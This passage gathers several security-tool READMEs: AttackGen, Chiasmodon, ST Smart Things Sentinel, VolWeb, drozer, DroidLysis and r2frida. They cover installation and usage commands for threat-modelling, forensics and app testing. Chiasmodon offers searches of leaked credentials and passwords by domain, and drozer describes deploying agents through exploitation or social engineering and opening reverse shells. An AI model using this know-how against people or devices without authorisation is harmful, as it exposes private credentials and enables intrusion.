Local Model Support using Ollama - Local Model Hosting: AttackGen now supports the use of locally hosted LLMs via an integration with Ollama. This feature is particularly useful for organisations with strict data privacy requirements or those who prefer to keep their data on-premises. Please note that this feature is not available for users of the AttackGen version hosted on Streamlit Community Cloud at https://attackgen.streamlit.app
Optional LangSmith Integration - Improved Flexibility: The integration with LangSmith is now optional. If no LangChain API key is provided, users will see an informative message indicating that the run won't be logged by LangSmith, rather than an error being thrown. This change improves the overall user experience and allows users to continue using AttackGen without the need for LangSmith.
Various Bug Fixes and Improvements - Enhanced User Experience: This release includes several bug fixes and improvements to the user interface, making AttackGen more user-friendly and robust.

v0.3

What's new? Why is it useful?
Azure OpenAI Service Integration - Enhanced Integration: Users can now choose to utilise OpenAI models deployed on the Azure OpenAI Service, in addition to the standard OpenAI API. This integration offers a seamless and secure solution for incorporating AttackGen into existing Azure ecosystems, leveraging established commercial and confidentiality agreements.

- Improved Data Security: Running AttackGen from Azure ensures that application descriptions and other data remain within the Azure environment, making it ideal for organizations that handle sensitive data in their threat models.
LangSmith for Azure OpenAI Service - Enhanced Debugging: LangSmith tracing is now available for scenarios generated using the Azure OpenAI Service. This feature provides a powerful tool for debugging, testing, and monitoring of model performance, allowing users to gain insights into the model's decision-making process and identify potential issues with the generated scenarios.

- User Feedback: LangSmith also captures user feedback on the quality of scenarios generated using the Azure OpenAI Service, providing valuable insights into model performance and user satisfaction.
Model Selection for OpenAI API - Flexible Model Options: Users can now select from several models available from the OpenAI API endpoint, such as gpt-4-turbo-preview. This allows for greater customization and experimentation with different language models, enabling users to find the most suitable model for their specific use case.
Docker Container Image - Easy Deployment: AttackGen is now available as a Docker container image, making it easier to deploy and run the application in a consistent and reproducible environment. This feature is particularly useful for users who want to run AttackGen in a containerised environment, or for those who want to deploy the application on a cloud platform.

v0.2

What's new? Why is it useful?
Custom Scenarios based on ATT&CK Techniques - For Mature Organisations: This feature is particularly beneficial if your organisation has advanced threat intelligence capabilities. For instance, if you're monitoring a newly identified or lesser-known threat actor group, you can tailor incident response testing scenarios specific to the techniques used by that group.

- Focused Testing: Alternatively, use this feature to focus your incident response testing on specific parts of the cyber kill chain or certain MITRE ATT&CK Tactics like 'Lateral Movement' or 'Exfiltration'. This is useful for organisations looking to evaluate and improve specific areas of their defence posture.
User feedback on generated scenarios - Collecting feedback is essential to track model performance over time and helps to highlight strengths and weaknesses in scenario generation tasks.
Improved error handling for missing API keys - Improved user experience.
Replaced Streamlit st.spinner widgets with new st.status widget - Provides better visibility into long running processes (i.e. scenario generation).

v0.1

Initial release.

Requirements

  • Recent version of Python.
  • Python packages: pandas, streamlit, and any other packages necessary for the custom libraries (langchain and mitreattack).
  • OpenAI API key.
  • LangChain API key (optional) - see LangSmith Setup section below for further details.
  • Data files: enterprise-attack.json (MITRE ATT&CK dataset in STIX format) and groups.json.

Installation

Option 1: Cloning the Repository

  1. Clone this repository:
git clone https://github.com/mrwadams/attackgen.git
  1. Change directory into the cloned repository:
cd attackgen
  1. Install the required Python packages:
pip install -r requirements.txt

Option 2: Using Docker

  1. Pull the Docker container image from Docker Hub:
docker pull mrwadams/attackgen

LangSmith Setup

If you would like to use LangSmith for debugging, testing, and monitoring of model performance, you will need to set up a LangSmith account and create a .streamlit/secrets.toml file that contains your LangChain API key. Please follow the instructions here to set up your account and obtain your API key. You'll find a secrets.toml-example file in the .streamlit/ directory that you can use as a template for your own secrets.toml file.

If you do not wish to use LangSmith, you must still have a .streamlit/secrets.toml file in place, but you can leave the LANGCHAIN_API_KEY field empty.

Data Setup

Download the latest version of the MITRE ATT&CK dataset in STIX format from here. Ensure to place this file in the ./data/ directory within the repository.

Running AttackGen

After the data setup, you can run AttackGen with the following command:

streamlit run 👋_Welcome.py

You can also try the app on Streamlit Community Cloud.

Usage

Running AttackGen

Option 1: Running the Streamlit App Locally

  1. Run the Streamlit app:
streamlit run 👋_Welcome.py
  1. Open your web browser and navigate to the URL provided by Streamlit.
  2. Use the app to generate standard or custom incident response scenarios (see below for details).

Option 2: Using the Docker Container Image

  1. Run the Docker container:
docker run -p 8501:8501 mrwadams/attackgen

This command will start the container and map port 8501 (default for Streamlit apps) from the container to your host machine. 2. Open your web browser and navigate to http://localhost:8501. 3. Use the app to generate standard or custom incident response scenarios (see below for details).

Generating Scenarios

Standard Scenario Generation

  1. Choose whether to use the OpenAI API or the Azure OpenAI Service.
  2. Enter your OpenAI API key, or the API key and deployment details for your model on the Azure OpenAI Service.
  3. Select your organisatin's industry and size from the dropdown menus.
  4. Navigate to the Threat Group Scenarios page.
  5. Select the Threat Actor Group that you want to simulate.
  6. Click on 'Generate Scenario' to create the incident response scenario.
  7. Use the 👍 or 👎 buttons to provide feedback on the quality of the generated scenario. N.B. The feedback buttons only appear if a value for LANGCHAIN_API_KEY has been set in the .streamlit/secrets.toml file.

Custom Scenario Generation

  1. Choose whether to use the OpenAI API or the Azure OpenAI Service.
  2. Enter your OpenAI API Key, or the API key and deployment details for your model on the Azure OpenAI Service.
  3. Select your organisation's industry and size from the dropdown menus.
  4. Navigate to the Custom Scenario page.
  5. Use the multi-select box to search for and select the ATT&CK techniques relevant to your scenario.
  6. Click 'Generate Scenario' to create your custom incident response testing scenario based on the selected techniques.
  7. Use the 👍 or 👎 buttons to provide feedback on the quality of the generated scenario. N.B. The feedback buttons only appear if a value for LANGCHAIN_API_KEY has been set in the .streamlit/secrets.toml file.

Please note that generating scenarios may take a minute or so. Once the scenario is generated, you can view it on the app and also download it as a Markdown file.

Contributing

I'm very happy to accept contributions to this project. Please feel free to submit an issue or pull request.

Licence

This project is licensed under GNU GPLv3.



Chiasmodon - An OSINT Tool Designed To Assist In The Process Of Gathering Information About A Target Domain


Chiasmodon is an OSINT (Open Source Intelligence) tool designed to assist in the process of gathering information about a target domain. Its primary functionality revolves around searching for domain-related data, including domain emails, domain credentials (usernames and passwords), CIDRs (Classless Inter-Domain Routing), ASNs (Autonomous System Numbers), and subdomains. the tool allows users to search by domain, CIDR, ASN, email, username, password, or Google Play application ID.


✨Features

  • [x] 🌐Domain: Conduct targeted searches by specifying a domain name to gather relevant information related to the domain.
  • [x] 🎮Google Play Application: Search for information related to a specific application on the Google Play Store by providing the application ID.
  • [x] 🔎CIDR and 🔢ASN: Explore CIDR blocks and Autonomous System Numbers (ASNs) associated with the target domain to gain insights into network infrastructure and potential vulnerabilities.
  • [x] ✉️Email, 👤Username, 🔒Password: Conduct searches based on email, username, or password to identify potential security risks or compromised credentials.
  • [x] 📋Output Customization: Choose the desired output format (text, JSON, or CSV) and specify the filename to save the search results.
  • [x] ⚙️Additional Options: The tool offers various additional options, such as viewing different result types (credentials, URLs, subdomains, emails, passwords, usernames, or applications), setting API tokens, specifying timeouts, limiting results, and more.

🚀Comming soon

  • 📱Phone: Get ready to uncover even more valuable data by searching for information associated with phone numbers. Whether you're investigating a particular individual or looking for connections between phone numbers and other entities, this new feature will provide you with valuable insights.

  • 🏢Company Name: We understand the importance of comprehensive company research. In our upcoming release, you'll be able to search by company name and access a wide range of documents associated with that company. This feature will provide you with a convenient and efficient way to gather crucial information, such as legal documents, financial reports, and other relevant records.

  • 👤Face (Photo): Visual data is a powerful tool, and we are excited to introduce our advanced facial recognition feature. With "Search by Face (Photo)," you can upload an image containing a face and leverage cutting-edge technology to identify and match individuals across various data sources. This will allow you to gather valuable information, such as social media profiles, online presence, and potential connections, all through the power of facial recognition.

Why Chiasmodon name ?

Chiasmodon niger is a species of deep sea fish in the family Chiasmodontidae. It is known for its ability to swallow fish larger than itself. and so do we. 😉 


🔑 Subscription

Join us today and unlock the potential of our cutting-edge OSINT tool. Contact https://t.me/Chiasmod0n on Telegram to subscribe and start harnessing the power of Chiasmodon for your domain investigations.

⬇️Install

pip install chiasmodon

💻Usage

Chiasmodon provides a flexible and user-friendly command-line interface and python library. Here are some examples to demonstrate its usage:

How to use pychiasmodon library:

from pychiasmodon import Chiasmodon as ch 
token = "PUT_HERE_YOUR_API_KEY"
obj = ch(token)
  • Searching for a target domain and its subdomains:

    • Command line bash chiasmodon_cli.py --domain example.com --all
    • Python ```python result = obj.search('example.com',method='domain', all=True)

      for i in result: print(i) ```

  • Searching for a target domain, you will see the result for only this "example.com":

    • Command line bash chiasmodon_cli.py --domain example.com
    • Python ```python result = obj.search('example.com',method='domain')

      for i in result: print(i) ```

  • Searching for a target application ID on the Google Play Store:

    • Command line bash chiasmodon_cli.py --app com.discord
    • Python ```python result = obj.search('com.discord',method='app')

      for i in result: print(i) ```

  • Searching for a target ASN:

    • Command line bash chiasmodon_cli.py --asn AS123 --view-type cred
    • Python ```python result = obj.search('AS123',method='asn', view_type='cred')

      for i in result: print(i) ```

  • earching for a target username:

    • Command line bash chiasmodon_cli.py --username someone
    • Python ```python result = obj.search('someone',method='username')

      for i in result: print(i) ```

  • Searching for a target password:

    • Command line bash chiasmodon_cli.py --password example@123
    • Python ```python result = obj.search('example@123',method='password')

      for i in result: print(i) ```

  • Searching for a target CIDR:

    • Command line bash chiasmodon_cli.py --cidr x.x.x.x/24
    • Python ```python result = obj.search('x.x.x.x/24',method='cidr')

      for i in result: print(i) ```

  • Searching for target credentials by domain emails:

    • Command line bash chiasmodon_cli.py --domain example.com --domain-emails
    • Python ```python result = obj.search('example.com',method='domain', only_domain_emails=True)

      for i in result: print(i) ``` - All methods and view types:

    Methods View Type
    --domain, --email, --cidr, --app, --asn, --username, --password --view-type cred
    --cidr, --asn, --email, --username, --password --view-type app
    --domain, --email, --cidr, --asn, --username, --password --view-type url
    --domain --view-type subdomain
    --domain, --cidr, --asn, --app --view-type email
    --domain, --cidr, --app, --asn, --email, --password --view-type username
    --domain, --cidr, --app, --asn, --email, --username --view-type password

Please note that these examples represent only a fraction of the available options and use cases. Refer to the documentation for more detailed instructions and explore the full range of features provided by Chiasmodon.

💬 Contributions and Feedback

Contributions and feedback are welcome! If you encounter any issues or have suggestions for improvements, please submit them to the Chiasmodon GitHub repository. Your input will help us enhance the tool and make it more effective for the OSINT community.

📜License

Chiasmodon is released under the MIT License. See the LICENSE file for more details.

⚠️Disclaimer

Chiasmodon is intended for legal and authorized use only. Users are responsible for ensuring compliance with applicable laws and regulations when using the tool. The developers of Chiasmodon disclaim any responsibility for the misuse or illegal use of the tool.

📢Acknowledgments

Chiasmodon is the result of collaborative efforts from a dedicated team of contributors who believe in the power of OSINT. We would like to express our gratitude to the open-source community for their valuable contributions and support.



ST Smart Things Sentinel - Advanced Security Tool To Detect Threats Within The Intricate Protocols utilized By IoT Devices


ST Smart Things Sentinel is an advanced security tool engineered specifically to scrutinize and detect threats within the intricate protocols utilized by IoT (Internet of Things) devices. In the ever-expanding landscape of connected devices, ST Smart Things Sentinel emerges as a vigilant guardian, specializing in protocol-level threat detection. This tool empowers users to proactively identify and neutralize potential security risks, ensuring the integrity and security of IoT ecosystems.


~ Hilali Abdel

USAGE

python st_tool.py [-h] [-s] [--add ADD] [--scan SCAN] [--id ID] [--search SEARCH] [--bug BUG] [--firmware FIRMWARE] [--type TYPE] [--detect] [--tty] [--uart UART] [--fz FZ]

[Add new Device]

python3 smartthings.py -a 192.168.1.1

python3 smarthings.py -s --type TPLINK

python3 smartthings.py -s --firmware TP-Link Archer C7v2

Search for CVE and Poc [ firmware and device type]

 

Scan device for open upnp ports

python3 smartthings.py -s --scan upnp --id

get data from mqtt 'subscribe'

python3 smartthings.py -s --scan mqtt --id



VolWeb - A Centralized And Enhanced Memory Analysis Platform


VolWeb is a digital forensic memory analysis platform that leverages the power of the Volatility 3 framework. It is dedicated to aiding in investigations and incident responses.


Objective

The goal of VolWeb is to enhance the efficiency of memory collection and forensic analysis by providing a centralized, visual, and enhanced web application for incident responders and digital forensics investigators. Once an investigator obtains a memory image from a Linux or Windows system, the evidence can be uploaded to VolWeb, which triggers automatic processing and extraction of artifacts using the power of the Volatility 3 framework.

By utilizing cloud-native storage technologies, VolWeb also enables incident responders to directly upload memory images into the VolWeb platform from various locations using dedicated scripts interfaced with the platform and maintained by the community. Another goal is to allow users to compile technical information, such as Indicators, which can later be imported into modern CTI platforms like OpenCTI, thereby connecting your incident response and CTI teams after your investigation.

Project Documentation and Getting Started Guide

The project documentation is available on the Wiki. There, you will be able to deploy the tool in your investigation environment or lab.

[!IMPORTANT] Take time to read the documentation in order to avoid common miss-configuration issues.

Interacting with the REST API

VolWeb exposes a REST API to allow analysts to interact with the platform. There is a dedicated repository proposing some scripts maintained by the community: https://github.com/forensicxlab/VolWeb-Scripts Check the wiki of the project to learn more about the possible API calls.

Issues

If you have encountered a bug, or wish to propose a feature, please feel free to open an issue. To enable us to quickly address them, follow the guide in the "Contributing" section of the Wiki associated with the project.

Contact

Contact me at [email protected] for any questions regarding this tool.

Next Release Goals

Check out the roadmap: https://github.com/k1nd0ne/VolWeb/projects/1



Drozer - The Leading Security Assessment Framework For Android


drozer (formerly Mercury) is the leading security testing framework for Android.

drozer allows you to search for security vulnerabilities in apps and devices by assuming the role of an app and interacting with the Dalvik VM, other apps' IPC endpoints and the underlying OS.

drozer provides tools to help you use, share and understand public Android exploits. It helps you to deploy a drozer Agent to a device through exploitation or social engineering. Using weasel (WithSecure's advanced exploitation payload) drozer is able to maximise the permissions available to it by installing a full agent, injecting a limited agent into a running process, or connecting a reverse shell to act as a Remote Access Tool (RAT).

drozer is a good tool for simulating a rogue application. A penetration tester does not have to develop an app with custom code to interface with a specific content provider. Instead, drozer can be used with little to no programming experience required to show the impact of letting certain components be exported on a device.

drozer is open source software, maintained by WithSecure, and can be downloaded from: https://labs.withsecure.com/tools/drozer/


Docker Container

To help with making sure drozer can be run on modern systems, a Docker container was created that has a working build of Drozer. This is currently the recommended method of using Drozer on modern systems.

  • The Docker container and basic setup instructions can be found here.
  • Instructions on building your own Docker container can be found here.

Manual Building and Installation

Prerequisites

  1. Python2.7

Note: On Windows please ensure that the path to the Python installation and the Scripts folder under the Python installation are added to the PATH environment variable.

  1. Protobuf 2.6 or greater

  2. Pyopenssl 16.2 or greater

  3. Twisted 10.2 or greater

  4. Java Development Kit 1.7

Note: On Windows please ensure that the path to javac.exe is added to the PATH environment variable.

  1. Android Debug Bridge

Building Python wheel

git clone https://github.com/WithSecureLabs/drozer.git
cd drozer
python setup.py bdist_wheel

Installing Python wheel

sudo pip install dist/drozer-2.x.x-py2-none-any.whl

Building for Debian/Ubuntu/Mint

git clone https://github.com/WithSecureLabs/drozer.git
cd drozer
make deb

Installing .deb (Debian/Ubuntu/Mint)

sudo dpkg -i drozer-2.x.x.deb

Building for Redhat/Fedora/CentOS

git clone https://github.com/WithSecureLabs/drozer.git
cd drozer
make rpm

Installing .rpm (Redhat/Fedora/CentOS)

sudo rpm -I drozer-2.x.x-1.noarch.rpm

Building for Windows

NOTE: Windows Defender and other Antivirus software will flag drozer as malware (an exploitation tool without exploit code wouldn't be much fun!). In order to run drozer you would have to add an exception to Windows Defender and any antivirus software. Alternatively, we recommend running drozer in a Windows/Linux VM.

git clone https://github.com/WithSecureLabs/drozer.git
cd drozer
python.exe setup.py bdist_msi

Installing .msi (Windows)

Run dist/drozer-2.x.x.win-x.msi 

Usage

Installing the Agent

Drozer can be installed using Android Debug Bridge (adb).

Download the latest Drozer Agent here.

$ adb install drozer-agent-2.x.x.apk

Starting a Session

You should now have the drozer Console installed on your PC, and the Agent running on your test device. Now, you need to connect the two and you're ready to start exploring.

We will use the server embedded in the drozer Agent to do this.

If using the Android emulator, you need to set up a suitable port forward so that your PC can connect to a TCP socket opened by the Agent inside the emulator, or on the device. By default, drozer uses port 31415:

$ adb forward tcp:31415 tcp:31415

Now, launch the Agent, select the "Embedded Server" option and tap "Enable" to start the server. You should see a notification that the server has started.

Then, on your PC, connect using the drozer Console:

On Linux:

$ drozer console connect

On Windows:

> drozer.bat console connect

If using a real device, the IP address of the device on the network must be specified:

On Linux:

$ drozer console connect --server 192.168.0.10

On Windows:

> drozer.bat console connect --server 192.168.0.10

You should be presented with a drozer command prompt:

selecting f75640f67144d9a3 (unknown sdk 4.1.1)  
dz>

The prompt confirms the Android ID of the device you have connected to, along with the manufacturer, model and Android software version.

You are now ready to start exploring the device.

Command Reference

Command Description
run Executes a drozer module
list Show a list of all drozer modules that can be executed in the current session. This hides modules that you do not have suitable permissions to run.
shell Start an interactive Linux shell on the device, in the context of the Agent process.
cd Mounts a particular namespace as the root of session, to avoid having to repeatedly type the full name of a module.
clean Remove temporary files stored by drozer on the Android device.
contributors Displays a list of people who have contributed to the drozer framework and modules in use on your system.
echo Print text to the console.
exit Terminate the drozer session.
help Display help about a particular command or module.
load Load a file containing drozer commands, and execute them in sequence.
module Find and install additional drozer modules from the Internet.
permissions Display a list of the permissions granted to the drozer Agent.
set Store a value in a variable that will be passed as an environment variable to any Linux shells spawned by drozer.
unset Remove a named variable that drozer passes to any Linux shells that it spawns.

License

drozer is released under a 3-clause BSD License. See LICENSE for full details.

Contacting the Project

drozer is Open Source software, made great by contributions from the community.

Bug reports, feature requests, comments and questions can be submitted here.



DroidLysis - Property Extractor For Android Apps


DroidLysis is a pre-analysis tool for Android apps: it performs repetitive and boring tasks we'd typically do at the beginning of any reverse engineering. It disassembles the Android sample, organizes output in directories, and searches for suspicious spots in the code to look at. The output helps the reverse engineer speed up the first few steps of analysis.

DroidLysis can be used over Android packages (apk), Dalvik executables (dex), Zip files (zip), Rar files (rar) or directories of files.


Installing DroidLysis

  1. Install required system packages
sudo apt-get install default-jre git python3 python3-pip unzip wget libmagic-dev libxml2-dev libxslt-dev
  1. Install Android disassembly tools

  2. Apktool ,

  3. Baksmali, and optionally
  4. Dex2jar and
  5. Obsolete: Procyon (note that Procyon only works with Java 8, not Java 11).
$ mkdir -p ~/softs
$ cd ~/softs
$ wget https://bitbucket.org/iBotPeaches/apktool/downloads/apktool_2.9.3.jar
$ wget https://bitbucket.org/JesusFreke/smali/downloads/baksmali-2.5.2.jar
$ wget https://github.com/pxb1988/dex2jar/releases/download/v2.4/dex-tools-v2.4.zip
$ unzip dex-tools-v2.4.zip
$ rm -f dex-tools-v2.4.zip
  1. Get DroidLysis from the Git repository (preferred) or from pip

Install from Git in a Python virtual environment (python3 -m venv, or pyenv virtual environments etc).

$ python3 -m venv venv
$ source ./venv/bin/activate
(venv) $ pip3 install git+https://github.com/cryptax/droidlysis

Alternatively, you can install DroidLysis directly from PyPi (pip3 install droidlysis).

  1. Configure conf/general.conf. In particular make sure to change /home/axelle with your appropriate directories.
[tools]
apktool = /home/axelle/softs/apktool_2.9.3.jar
baksmali = /home/axelle/softs/baksmali-2.5.2.jar
dex2jar = /home/axelle/softs/dex-tools-v2.4/d2j-dex2jar.sh
procyon = /home/axelle/softs/procyon-decompiler-0.5.30.jar
keytool = /usr/bin/keytool
...
  1. Run it:
python3 ./droidlysis3.py --help

Configuration

The configuration file is ./conf/general.conf (you can switch to another file with the --config option). This is where you configure the location of various external tools (e.g. Apktool), the name of pattern files (by default ./conf/smali.conf, ./conf/wide.conf, ./conf/arm.conf, ./conf/kit.conf) and the name of the database file (only used if you specify --enable-sql)

Be sure to specify the correct paths for disassembly tools, or DroidLysis won't find them.

Usage

DroidLysis uses Python 3. To launch it and get options:

droidlysis --help

For example, test it on Signal's APK:

droidlysis --input Signal-website-universal-release-6.26.3.apk --output /tmp --config /PATH/TO/DROIDLYSIS/conf/general.conf

DroidLysis outputs:

  • A summary on the console (see image above)
  • The unzipped, pre-processed sample in a subdirectory of your output dir. The subdirectory is named using the sample's filename and sha256 sum. For example, if we analyze the Signal application and set --output /tmp, the analysis will be written to /tmp/Signalwebsiteuniversalrelease4.52.4.apk-f3c7d5e38df23925dd0b2fe1f44bfa12bac935a6bc8fe3a485a4436d4487a290.
  • A database (by default, SQLite droidlysis.db) containing properties it noticed.

Options

Get usage with droidlysis --help

  • The input can be a file or a directory of files to recursively look into. DroidLysis knows how to process Android packages, DEX, ODEX and ARM executables, ZIP, RAR. DroidLysis won't fail on other type of files (unless there is a bug...) but won't be able to understand the content.

  • When processing directories of files, it is typically quite helpful to move processed samples to another location to know what has been processed. This is handled by option --movein. Also, if you are only interested in statistics, you should probably clear the output directory which contains detailed information for each sample: this is option --clearoutput. If you want to store all statistics in a SQL database, use --enable-sql (see here)

  • DEX decompilation is quite long with Procyon, so this option is disabled by default. If you want to decompile to Java, use --enable-procyon.

  • DroidLysis's analysis does not inspect known 3rd party SDK by default, i.e. for instance it won't report any suspicious activity from these. If you want them to be inspected, use option --no-kit-exception. This usually creates many more detected properties for the sample, as SDKs (e.g. advertisment) use lots of flagged APIs (get GPS location, get IMEI, get IMSI, HTTP POST...).

Sample output directory (--output DIR)

This directory contains (when applicable):

  • A readable AndroidManifest.xml
  • Readable resources in res
  • Libraries lib, assets assets
  • Disassembled Smali code: smali (and others)
  • Package meta information: META-INF
  • Package contents when simply unzipped in ./unzipped
  • DEX executable classes.dex (and others), and converted to jar: classes-dex2jar.jar, and unjarred in ./unjarred

The following files are generated by DroidLysis:

  • autoanalysis.md: lists each pattern DroidLysis detected and where.
  • report.md: same as what was printed on the console

If you do not need the sample output directory to be generated, use the option --clearoutput.

Import trackers from Exodus etc (--import-exodus)

$ python3 ./droidlysis3.py --import-exodus --verbose
Processing file: ./droidurl.pyc ...
DEBUG:droidconfig.py:Reading configuration file: './conf/./smali.conf'
DEBUG:droidconfig.py:Reading configuration file: './conf/./wide.conf'
DEBUG:droidconfig.py:Reading configuration file: './conf/./arm.conf'
DEBUG:droidconfig.py:Reading configuration file: '/home/axelle/.cache/droidlysis/./kit.conf'
DEBUG:droidproperties.py:Importing ETIP Exodus trackers from https://etip.exodus-privacy.eu.org/api/trackers/?format=json
DEBUG:connectionpool.py:Starting new HTTPS connection (1): etip.exodus-privacy.eu.org:443
DEBUG:connectionpool.py:https://etip.exodus-privacy.eu.org:443 "GET /api/trackers/?format=json HTTP/1.1" 200 None
DEBUG:droidproperties.py:Appending imported trackers to /home/axelle/.cache/droidlysis/./kit.conf

Trackers from Exodus which are not present in your initial kit.conf are appended to ~/.cache/droidlysis/kit.conf. Diff the 2 files and check what trackers you wish to add.

SQLite database{#sqlite_database}

If you want to process a directory of samples, you'll probably like to store the properties DroidLysis found in a database, to easily parse and query the findings. In that case, use the option --enable-sql. This will automatically dump all results in a database named droidlysis.db, in a table named samples. Each entry in the table is relative to a given sample. Each column is properties DroidLysis tracks.

For example, to retrieve all filename, SHA256 sum and smali properties of the database:

sqlite> select sha256, sanitized_basename, smali_properties from samples;
f3c7d5e38df23925dd0b2fe1f44bfa12bac935a6bc8fe3a485a4436d4487a290|Signalwebsiteuniversalrelease4.52.4.apk|{"send_sms": true, "receive_sms": true, "abort_broadcast": true, "call": false, "email": false, "answer_call": false, "end_call": true, "phone_number": false, "intent_chooser": true, "get_accounts": true, "contacts": false, "get_imei": true, "get_external_storage_stage": false, "get_imsi": false, "get_network_operator": false, "get_active_network_info": false, "get_line_number": true, "get_sim_country_iso": true,
...

Property patterns

What DroidLysis detects can be configured and extended in the files of the ./conf directory.

A pattern consist of:

  • a tag name: example send_sms. This is to name the property. Must be unique across the .conf file.
  • a pattern: this is a regexp to be matched. Ex: ;->sendTextMessage|;->sendMultipartTextMessage|SmsManager;->sendDataMessage. In the smali.conf file, this regexp is match on Smali code. In this particular case, there are 3 different ways to send SMS messages from the code: sendTextMessage, sendMultipartTextMessage and sendDataMessage.
  • a description (optional): explains the importance of the property and what it means.
[send_sms]
pattern=;->sendTextMessage|;->sendMultipartTextMessage|SmsManager;->sendDataMessage
description=Sending SMS messages

Importing Exodus Privacy Trackers

Exodus Privacy maintains a list of various SDKs which are interesting to rule out in our analysis via conf/kit.conf. Add option --import_exodus to the droidlysis command line: this will parse existing trackers Exodus Privacy knows and which aren't yet in your kit.conf. Finally, it will append all new trackers to ~/.cache/droidlysis/kit.conf.

Afterwards, you may want to sort your kit.conf file:

import configparser
import collections
import os

config = configparser.ConfigParser({}, collections.OrderedDict)
config.read(os.path.expanduser('~/.cache/droidlysis/kit.conf'))
# Order all sections alphabetically
config._sections = collections.OrderedDict(sorted(config._sections.items(), key=lambda t: t[0] ))
with open('sorted.conf','w') as f:
config.write(f)

Updates

  • v3.4.6 - Detecting manifest feature that automatically loads APK at install
  • v3.4.5 - Creating a writable user kit.conf file
  • v3.4.4 - Bug fix #14
  • v3.4.3 - Using configuration files
  • v3.4.2 - Adding import of Exodus Privacy Trackers
  • v3.4.1 - Removed dependency to Androguard
  • v3.4.0 - Multidex support
  • v3.3.1 - Improving detection of Base64 strings
  • v3.3.0 - Dumping data to JSON
  • v3.2.1 - IP address detection
  • v3.2.0 - Dex2jar is optional
  • v3.1.0 - Detection of Base64 strings


R2Frida - Radare2 And Frida Better Together


This is a self-contained plugin for radare2 that allows to instrument remote processes using frida.

The radare project brings a complete toolchain for reverse engineering, providing well maintained functionalities and extend its features with other programming languages and tools.

Frida is a dynamic instrumentation toolkit that makes it easy to inspect and manipulate running processes by injecting your own JavaScript, and optionally also communicate with your scripts.


Features

  • Run unmodified Frida scripts (Use the :. command)
  • Execute snippets in C, Javascript or TypeScript in any process
  • Can attach, spawn or launch in local or remote systems
  • List sections, symbols, exports, protocols, classes, methods
  • Search for values in memory inside the agent or from the host
  • Replace method implementations or create hooks with short commands
  • Load libraries and frameworks in the target process
  • Support Dalvik, Java, ObjC, Swift and C interfaces
  • Manipulate file descriptors and environment variables
  • Send signals to the process, continue, breakpoints
  • The r2frida io plugin is also a filesystem fs and debug backend
  • Automate r2 and frida using r2pipe
  • Read/Write process memory
  • Call functions, syscalls and raw code snippets
  • Connect to frida-server via usb or tcp/ip
  • Enumerate apps and processes
  • Trace registers, arguments of functions
  • Tested on x64, arm32 and arm64 for Linux, Windows, macOS, iOS and Android
  • Doesn't require frida to be installed in the host (no need for frida-tools)
  • Extend the r2frida commands with plugins that run in the agent
  • Change page permissions, patch code and data
  • Resolve symbols by name or address and import them as flags into r2
  • Run r2 commands in the host from the agent
  • Use r2 apis and run r2 commands inside the remote target process.
  • Native breakpoints using the :db api
  • Access remote filesystems using the r_fs api.

Installation

The recommended way to install r2frida is via r2pm:

$ r2pm -ci r2frida

Binary builds that don't require compilation will be soon supported in r2pm and r2env. Meanwhile feel free to download the last builds from the Releases page.

Compilation

Dependencies

  • radare2
  • pkg-config (not required on windows)
  • curl or wget
  • make, gcc
  • npm, nodejs (will be soon removed)

In GNU/Debian you will need to install the following packages:

$ sudo apt install -y make gcc libzip-dev nodejs npm curl pkg-config git

Instructions

$ git clone https://github.com/nowsecure/r2frida.git
$ cd r2frida
$ make
$ make user-install

Windows

  • Install meson and Visual Studio
  • Unzip the latest radare2 release zip in the r2frida root directory
  • Rename it to radare2 (instead of radare2-x.y.z)
  • To make the VS compiler available in PATH (preconfigure.bat)
  • Run configure.bat and then make.bat
  • Copy the b\r2frida.dll into r2 -H R2_USER_PLUGINS

Usage

For testing, use r2 frida://0, as attaching to the pid0 in frida is a special session that runs in local. Now you can run the :? command to get the list of commands available.

$ r2 'frida://?'
r2 frida://[action]/[link]/[device]/[target]
* action = list | apps | attach | spawn | launch
* link = local | usb | remote host:port
* device = '' | host:port | device-id
* target = pid | appname | process-name | program-in-path | abspath
Local:
* frida://? # show this help
* frida:// # list local processes
* frida://0 # attach to frida-helper (no spawn needed)
* frida:///usr/local/bin/rax2 # abspath to spawn
* frida://rax2 # same as above, considering local/bin is in PATH
* frida://spawn/$(program) # spawn a new process in the current system
* frida://attach/(target) # attach to target PID in current host
USB:
* frida://list/usb// # list processes in the first usb device
* frida://apps/usb// # list apps in the first usb device
* frida://attach/usb//12345 # attach to given pid in the first usb device
* frida://spawn/usb//appname # spawn an app in the first resolved usb device
* frida://launch/usb//appname # spawn+resume an app in the first usb device
Remote:
* frida://attach/remote/10.0.0.3:9999/558 # attach to pid 558 on tcp remote frida-server
Environment: (Use the `%` command to change the environment at runtime)
R2FRIDA_SAFE_IO=0|1 # Workaround a Frida bug on Android/thumb
R2FRIDA_DEBUG=0|1 # Used to debug argument parsing behaviour
R2FRIDA_COMPILER_DISABLE=0|1 # Disable the new frida typescript compiler (`:. foo.ts`)
R2FRIDA_AGENT_SCRIPT=[file] # path to file of the r2frida agent

Examples

$ r2 frida://0     # same as frida -p 0, connects to a local session

You can attach, spawn or launch to any program by name or pid, The following line will attach to the first process named rax2 (run rax2 - in another terminal to test this line)

$ r2 frida://rax2  # attach to the first process named `rax2`
$ r2 frida://1234 # attach to the given pid

Using the absolute path of a binary to spawn will spawn the process:

$ r2 frida:///bin/ls
[0x00000000]> :dc # continue the execution of the target program

Also works with arguments:

$ r2 frida://"/bin/ls -al"

For USB debugging iOS/Android apps use these actions. Note that spawn can be replaced with launch or attach, and the process name can be the bundleid or the PID.

$ r2 frida://spawn/usb/         # enumerate devices
$ r2 frida://spawn/usb// # enumerate apps in the first iOS device
$ r2 frida://spawn/usb//Weather # Run the weather app

Commands

These are the most frequent commands, so you must learn them and suffix it with ? to get subcommands help.

:i        # get information of the target (pid, name, home, arch, bits, ..)
.:i* # import the target process details into local r2
:? # show all the available commands
:dm # list maps. Use ':dm|head' and seek to the program base address
:iE # list the exports of the current binary (seek)
:dt fread # trace the 'fread' function
:dt-* # delete all traces

Plugins

r2frida plugins run in the agent side and are registered with the r2frida.pluginRegister API.

See the plugins/ directory for some more example plugin scripts.

[0x00000000]> cat example.js
r2frida.pluginRegister('test', function(name) {
if (name === 'test') {
return function(args) {
console.log('Hello Args From r2frida plugin', args);
return 'Things Happen';
}
}
});
[0x00000000]> :. example.js # load the plugin script

The :. command works like the r2's . command, but runs inside the agent.

:. a.js  # run script which registers a plugin
:. # list plugins
:.-test # unload a plugin by name
:.. a.js # eternalize script (keeps running after detach)

Termux

